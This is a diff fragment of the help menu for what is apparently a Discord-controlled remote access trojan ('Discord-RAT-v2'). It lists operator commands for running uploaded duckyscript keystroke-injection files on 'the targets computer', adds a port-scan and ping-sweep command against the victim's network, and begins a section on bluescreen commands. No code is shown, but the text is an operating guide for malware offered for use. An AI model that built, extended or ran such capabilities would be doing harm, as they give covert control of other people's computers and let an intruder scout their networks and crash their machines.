simen64/Discord-RAT-v2/help_menu.md

 !keyboard duckyscript = Upload a duckyscript file that will get executed on the targets computer.
 Note that this only supports very simple duckyscript syntax like: REM, STRING, STRINGLN, DELAY, and hotkeys

+### Port Scan
+You can use the port scan command to scan ports on your targets network.
+Do note that the way the scanner works with python sockets some ports may be registred as open even though they are not.
+You may scan just one ip or a whole subnet using something like `192.168.4.0/24`.
+The ip you enter will be ping swept to check if they are up.

+!ports ip = Starts the port scan

 ## Windows commands:

 ### Bluescreen commands: